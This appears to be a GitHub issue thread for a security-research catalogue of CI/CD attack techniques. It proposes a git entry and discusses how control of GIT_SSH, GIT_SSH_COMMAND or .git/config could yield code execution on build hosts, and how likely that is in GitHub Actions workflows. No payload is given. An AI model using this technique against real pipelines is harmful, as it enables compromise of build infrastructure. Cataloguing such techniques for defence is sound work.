Open sysophost opened 9 months ago
@sysophost that's absolutely correct and there is another PR open now https://github.com/boostsecurityio/lotp/pull/15
The reason I'm not jumping to include it is because the scenario you are describing is not well aligned with all the others I've been focusing so far. You are 100% right that if attacker controls those, there is RCE, but it's very unlikely in an average GitHub Actions workflow for instance. The example given in the PR ^ is via a file, so that is a bit more likely, but still, GitHub not allow pushing .git/config
, so you cannot have that unless in the workflow you explicitely a template from the repo over to .git/config
, which I'm seen in practice, so I'm willing to accept that PR more or less as proposed.
Description of the LOTP tool
git
is often present in CI pipelines where repos are pulled in at build time. Being able to controlGIT_SSH
orGIT_SSH_COMMAND
in the pipeline environment variables could result in code execution on build hosts where direct access to the host isn't possible.Ref